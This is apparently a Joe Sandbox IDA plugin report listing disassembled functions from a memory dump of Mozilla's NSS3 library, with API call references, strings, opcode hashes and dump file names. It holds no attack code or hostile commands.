Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
String ID:
API String ID: 2753656479-0
Opcode ID: 1aac2ed3285b0f02be27076ba6ab1c267a9793818a24feb92242c17b8cd673cc
Instruction ID: 4c7f1b6a51f0b9488bcbe9e237c76fbc9dbfc92b3ab68c4621fc507b237dcd40
Opcode Fuzzy Hash: 1aac2ed3285b0f02be27076ba6ab1c267a9793818a24feb92242c17b8cd673cc
Instruction Fuzzy Hash: C7514075E001159BDB10DFA8DA84ADEB7B8BF08359F148175E904B7B01E731ED64CBA1

Function 6C7D8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C7D7313), ref: 6C7D8FBB

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D90F1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C7D7313), ref: 6C7D906B

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C7D7313), ref: 6C7D9128

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 865e10fc876283a4ecce09836916c367dae9e41b70a9d42ff0a3105db8f9325e
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: C9518171A002028FEB109F6ADE58B66B3F9AF54358F164139D915D7B61EF32F804CB91

Function 6C7C2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C7C2D7C,6C799192,?), ref: 6C7C248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C7C24A2
memset.VCRUNTIME140(6C7C2D7C,00000020,6C7C2D5C), ref: 6C7C250E
memset.VCRUNTIME140(6C7C2D9C,00000020,6C7C2D7C), ref: 6C7C2535
memset.VCRUNTIME140(?,00000020,?), ref: 6C7C255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C7C2583
PR_Unlock.NSS3(?), ref: 6C7C2594
PR_SetError.NSS3(00000000,00000000), ref: 6C7C25AF

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 713b9707253fa7482c56325e81a6c8654860ca4b522edd21cc03a17840663c79
Instruction ID: 0e5bdc0a01d762fa878a0bfcd1e3078e7b54ec888642a557b8de6a621aa3bcc3
Opcode Fuzzy Hash: 713b9707253fa7482c56325e81a6c8654860ca4b522edd21cc03a17840663c79
Instruction Fuzzy Hash: 8841C4B1F002025FEB159F34EE587AA3774BB59308F142A79DC05D7A52F770EA84C692

Function 6C7B88E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B88FC

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C7B8913

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C89D864,?), ref: 6C7B8947

Part of subcall function 6C7CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7CE245
Part of subcall function 6C7CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7CE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C7B895B
DER_GetInteger_Util.NSS3(?), ref: 6C7B8973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7B8982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B89EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7B8A12

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 89e3759c4165ff3e2b22ffe9affe3d0e1fac85d3f383fce6f4d8d6378e2c2517
Instruction ID: 4cc9dec6ebbe33adc80a6ff8bdec6a472040537053e3075fe8b73bf3b2457cf8
Opcode Fuzzy Hash: 89e3759c4165ff3e2b22ffe9affe3d0e1fac85d3f383fce6f4d8d6378e2c2517
Instruction Fuzzy Hash: 093150B1B0460257FF104A39AE497AA3A995F5131CF240B37D515F7B81FB35D4498193

Function 6C76AB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6C76ABAF
GetLastError.KERNEL32 ref: 6C76AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C76AC50

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6C76AC62
CloseHandle.KERNEL32(?), ref: 6C76AC75
CloseHandle.KERNEL32(?), ref: 6C76AC7A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: 718ae1f4cd4189611660eca5646c522a78c5b214c4a1e4b95a623bbd9dfbab00
Instruction ID: 335d6531a9716e8d702ef900c5f7028f1a30523c0877f47bd338ad2928215b43
Opcode Fuzzy Hash: 718ae1f4cd4189611660eca5646c522a78c5b214c4a1e4b95a623bbd9dfbab00
Instruction Fuzzy Hash: 0831E074A001159FDB14DFA9CA489AABBF4FF49318B258078E9099BB21D731AD05CBE0

Function 6C794A10 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C795385,?,?,00000000), ref: 6C794A29
EnterCriticalSection.KERNEL32 ref: 6C794A42
TlsGetValue.KERNEL32 ref: 6C794A5F
EnterCriticalSection.KERNEL32 ref: 6C794A78
PL_HashTableLookup.NSS3 ref: 6C794A91
PR_Unlock.NSS3 ref: 6C794A9E
PR_Now.NSS3 ref: 6C794AAD
PR_Unlock.NSS3 ref: 6C794AD2

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 545d4773277f5e9e7b1565e24ea9853e15ea2a1e66fa190c597f826c28ba4720
Instruction ID: 4d4c31d1c3632d44d10a0e6decf9b05dd00ee2061f56236f9d7c265980ba31d0
Opcode Fuzzy Hash: 545d4773277f5e9e7b1565e24ea9853e15ea2a1e66fa190c597f826c28ba4720
Instruction Fuzzy Hash: A0312C75A046119FCB10AF78D18845ABBF4FF09358B058969EC9997B01EB30E894CBD1

Function 6C794BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C79A6A2,?,?,00000000), ref: 6C794BB9
EnterCriticalSection.KERNEL32 ref: 6C794BD2
TlsGetValue.KERNEL32 ref: 6C794BEF
EnterCriticalSection.KERNEL32 ref: 6C794C08
PL_HashTableLookup.NSS3 ref: 6C794C21
PR_Unlock.NSS3 ref: 6C794C2E
PR_Now.NSS3 ref: 6C794C3D
PR_Unlock.NSS3 ref: 6C794C62

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 6a20a98e8de8fc6e157305142560de9ab3cd6da4213a607e10fbf5df2e697f5c
Instruction ID: 012e4b3ba5444731bffd439d0dd1b7a02455264dd3ef59e5dc3c135737b684ee
Opcode Fuzzy Hash: 6a20a98e8de8fc6e157305142560de9ab3cd6da4213a607e10fbf5df2e697f5c
Instruction Fuzzy Hash: 95312CB5A046119FCB10AF7CD18846ABBF4FF09358B018969EC9997B01EB30E894CBD1

Function 6C880860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C88086C

Part of subcall function 6C880930: EnterCriticalSection.KERNEL32(?,00000000,?,6C880C83), ref: 6C88094F
Part of subcall function 6C880930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C880C83), ref: 6C880974
Part of subcall function 6C880930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880983
Part of subcall function 6C880930: _PR_MD_UNLOCK.NSS3(?,?,6C880C83), ref: 6C88099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C88087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C880892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C88798A), ref: 6C8808AA
free.MOZGLUE(?,00000000,00000000,?,?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C8808C7
free.MOZGLUE(?,00000000,00000000,?,?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C8808E9
free.MOZGLUE(?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C8808EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C887AE2,?,?,?,?,?,?,6C88798A), ref: 6C88090E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 3e1857cc7cd32bc184bab8e522238a1f9181837fb83dd4c12c8d8e6cb5a8c421
Instruction ID: 9c462ac9e15451f18c6b78955ca3464a0ae587fb1731bc9ad17ea5a0b694e9a4
Opcode Fuzzy Hash: 3e1857cc7cd32bc184bab8e522238a1f9181837fb83dd4c12c8d8e6cb5a8c421
Instruction Fuzzy Hash: A1117CB1B032504BEB20AB98EE5574A3778AF4236DF190534E81687A41DB31F944CBD2

Function 6C7E8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7E8C93

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C7C8A60: TlsGetValue.KERNEL32(6C7761C4,?,6C775F9C,00000000), ref: 6C7C8A81
Part of subcall function 6C7C8A60: TlsGetValue.KERNEL32(?,?,?,6C775F9C,00000000), ref: 6C7C8A9E
Part of subcall function 6C7C8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C775F9C,00000000), ref: 6C7C8AB7
Part of subcall function 6C7C8A60: PR_Unlock.NSS3(?,?,?,?,?,6C775F9C,00000000), ref: 6C7C8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C7E8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C7E8D10

Part of subcall function 6C7C8970: TlsGetValue.KERNEL32(?,00000000,6C7761C4,?,6C775639,00000000), ref: 6C7C8991
Part of subcall function 6C7C8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C775639,00000000), ref: 6C7C89AD
Part of subcall function 6C7C8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C775639,00000000), ref: 6C7C89C6
Part of subcall function 6C7C8970: PR_WaitCondVar.NSS3 ref: 6C7C89F7
Part of subcall function 6C7C8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C775639,00000000), ref: 6C7C8A0C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 720a0ea3f9c91fc69346bc214e48524d1f90d3ce9f15aea97f67f9340317740d
Instruction ID: 67a482d5a8ddd5bbcf4878f0bfceffbf12f6b57cb651b5744ad745d829df2bd5
Opcode Fuzzy Hash: 720a0ea3f9c91fc69346bc214e48524d1f90d3ce9f15aea97f67f9340317740d
Instruction Fuzzy Hash: F3B170B1D002089FDB14CF69DD44AAEB7BAFF48308F10452ED81AA7751E731A955CB91

Function 6C78CB60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6C7957DF,00000000,?,00000002,6C795840,?), ref: 6C78CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6C7957DF,00000000,?,00000002,6C795840,?), ref: 6C78CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6C7957DF,00000000,?,00000002,6C795840), ref: 6C78CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C78CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C78CD50

Strings

@Xyl, xrefs: 6C78CB6C, 6C78CD8D, 6C78CDA3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID: @Xyl
API String ID: 1974170392-1644566501
Opcode ID: 11980d4955f8f1183be087abc4cd4e4358f9d3482c2e1a7a19dd41e3b59315a6
Instruction ID: d3aecdca85b2b134d95b63a312bc602c624db008aecabe156ab1d6d1671e1501
Opcode Fuzzy Hash: 11980d4955f8f1183be087abc4cd4e4358f9d3482c2e1a7a19dd41e3b59315a6
Instruction Fuzzy Hash: D991D475E021189FDB10EFA8EA85A9EBBB4FF49319F140239EA05E7711D730E805CB90

Function 6C6F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F51BB

Strings

misuse, xrefs: 6C6F51AF
unable to delete/modify user-function due to active statements, xrefs: 6C6F51DF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F51A5
%s at line %d of [%.10s], xrefs: 6C6F51B4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction ID: 49d7c72dfc9d13bdde6744f5a04f74290b06a859542613cf041ad8bc7b1b9933
Opcode Fuzzy Hash: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction Fuzzy Hash: 0471B07160420A9FEB00CE59CD80BDA77B6BF49308F048524FD299BB45D331ED56CBA5

Function 6C762D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C762D69

Strings

winUnmapfile1, xrefs: 6C762F55
winUnmapfile2, xrefs: 6C762F7F
winSeekFile, xrefs: 6C762E9C
winTruncate2, xrefs: 6C762EF8
winTruncate1, xrefs: 6C762EBE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
